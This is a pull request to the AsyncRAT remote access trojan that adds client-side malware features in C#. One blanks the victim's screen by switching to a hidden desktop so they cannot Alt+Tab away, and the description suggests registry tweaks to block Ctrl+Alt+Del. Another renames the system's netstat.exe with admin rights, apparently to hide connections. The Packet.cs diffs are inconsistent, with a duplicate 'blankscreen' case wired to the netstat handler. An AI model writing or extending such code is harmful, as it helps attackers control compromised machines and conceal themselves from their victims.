### PR TITLE
Blank Screen function for Client

### DIFF
--- a/AsyncRAT-C#/Client/Handle Packet/HandleBlankScreen.cs
+++ b/AsyncRAT-C#/Client/Handle Packet/HandleBlankScreen.cs
@@ -1,0 +1,71 @@
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Runtime.InteropServices;
+using System.Text;
+
+namespace Client.Handle_Packet
+{
+    class HandleBlankScreen
+    {
+        [DllImport("user32.dll")]
+        public static extern IntPtr CreateDesktop(string lpszDesktop, IntPtr lpszDevice, IntPtr pDevmode, int dwFlags, uint dwDesiredAccess, IntPtr lpsa);
+
+        [DllImport("user32.dll")]
+        private static extern bool SwitchDesktop(IntPtr hDesktop);
+
+        [DllImport("user32.dll")]
+        public static extern bool CloseDesktop(IntPtr handle);
+
+        [DllImport("user32.dll")]
+        public static extern bool SetThreadDesktop(IntPtr hDesktop);
+
+        [DllImport("user32.dll")]
+        public static extern IntPtr GetThreadDesktop(int dwThreadId);
+
+        [DllImport("kernel32.dll")]
+        public static extern int GetCurrentThreadId();
+        enum DESKTOP_ACCESS : uint
+        {
+            DESKTOP_NONE = 0,
+            DESKTOP_READOBJECTS = 0x0001,
+            DESKTOP_CREATEWINDOW = 0x0002,
+            DESKTOP_CREATEMENU = 0x0004,
+            DESKTOP_HOOKCONTROL = 0x0008,
+            DESKTOP_JOURNALRECORD = 0x0010,
+            DESKTOP_JOURNALPLAYBACK = 0x0020,
+            DESKTOP_ENUMERATE = 0x0040,
+            DESKTOP_WRITEOBJECTS = 0x0080,
+            DESKTOP_SWITCHDESKTOP = 0x0100,
+
+            GENERIC_ALL = (DESKTOP_READOBJECTS | DESKTOP_CREATEWINDOW | DESKTOP_CREATEMENU |
+                            DESKTOP_HOOKCONTROL | DESKTOP_JOURNALRECORD | DESKTOP_JOURNALPLAYBACK |
+                            DESKTOP_ENUMERATE | DESKTOP_WRITEOBJECTS | DESKTOP_SWITCHDESKTOP),
+        }
+
+        // old desktop's handle, obtained by getting the current desktop assigned for this thread
+        static readonly IntPtr hOldDesktop = GetThreadDesktop(GetCurrentThreadId());
+
+        // new desktop's handle, assigned automatically by CreateDesktop
+        static IntPtr hNewDesktop = CreateDesktop("RandomDesktopName", IntPtr.Zero, IntPtr.Zero, 0, (uint)DESKTOP_ACCESS.GENERIC_ALL, IntPtr.Zero);
+
+        public static bool switcher = false; //the screen is not blanked be default so this should be false
+        public static void RunBlankScreen()
+        {
+            //light switch logic CopyPasta by MrDevBot
+
+            if (switcher == false) //The current screen is NOT blanked and needs to be
+            {
+                SwitchDesktop(hNewDesktop);
+                switcher = true; //sets the switch to on for next click
+                return; //returns to calling function
+            }
+            else //the screen is blanked and should be switched back to old
+            {
+                SwitchDesktop(hOldDesktop); 
+                switcher = false; //sets the switch to off for next click
+                return; //returns to calling function
+            }
+        }
+    }
+}

--- a/AsyncRAT-C#/Client/Handle Packet/HandleNetStat
+++ b/AsyncRAT-C#/Client/Handle Packet/HandleNetStat
@@ -1,0 +1,39 @@
+using Client.Helper;
+using System;
+
+namespace Client.Handle_Packet
+{
+    class HandleNetStat
+    {
+        static bool switcher = false;
+        public static void RunNetStat()
+        {
+            //light switch logic CopyPasta by MrDevBot
+            if (!Methods.IsAdmin()) return; //if we are not admin return
+
+            if (switcher == false) //The current screen is NOT blanked and needs to be
+            {
+                try
+                {
+                    System.IO.File.Move("C:\\Windows\\System32\\NETSTAT.exe", "C:\\Windows\\System32\\NETSTAT.Backup.txt");
+                }
+                catch(Exception ex) //probably AntiTamper protection or Admin Privilages 
+                { }
+
+                switcher = true; //sets the switch to on for next click
+                return; //returns to calling function
+            }
+            else //the screen is blanked and should be switched back to old
+            {
+                try
+                {
+                    System.IO.File.Move("C:\\Windows\\System32\\NETSTAT.Backup.txt", "C:\\Windows\\System32\\NETSTAT.EXE");
+                }
+                catch (Exception ex) //probably AntiTamper protection or Admin Privilages 
+                { }
+                switcher = false; //sets the switch to off for next click
+                return; //returns to calling function
+            }
+        }
+    }
+}

--- a/AsyncRAT-C#/Client/Handle Packet/Packet.cs
+++ b/AsyncRAT-C#/Client/Handle Packet/Packet.cs
@@ -303,6 +303,12 @@ namespace Client.Handle_Packet
                             new HandleBlankScreen();
                             break;
                         }
+                        
+                    case "blankscreen":
+                        {
+                            new HandleNetStat();
+                            break;
+                        }
                 }
             }
             catch (Exception ex)

--- a/AsyncRAT-C#/Client/Handle Packet/Packet.cs
+++ b/AsyncRAT-C#/Client/Handle Packet/Packet.cs
@@ -297,6 +297,7 @@ namespace Client.Handle_Packet
                             new HandlerExecuteDotNetCode(unpack_msgpack);
                             break;
                         }
+                        
                     case "blankscreen":
                         {
                             new HandleBlankScreen();

--- a/AsyncRAT-C#/Client/Handle Packet/Packet.cs
+++ b/AsyncRAT-C#/Client/Handle Packet/Packet.cs
@@ -297,6 +297,11 @@ namespace Client.Handle_Packet
                             new HandlerExecuteDotNetCode(unpack_msgpack);
                             break;
                         }
+                    case "blankscreen":
+                        {
+                            new HandleBlankScreen();
+                            break;
+                        }
                 }
             }
             catch (Exception ex)


### PR DESCRIPTION
#Added the logic and handler to the client for a blank screen (show default windows color) function to the client and added a call to the handler in packets.cs.

This method has the added benefit that the user cannot `ALT+TAB` or `ALT+F4` to refocus on another window by putting the user in a different virtual desktop. Granted the user can still `CTRL+ALT+DEL` however most of these controls could be fixed with a registry tweak to disable them.

**NOTE: No changes have been made to the server GUI, please add a button to the "ClientContextMenu" this is ONLY the client logic** #65 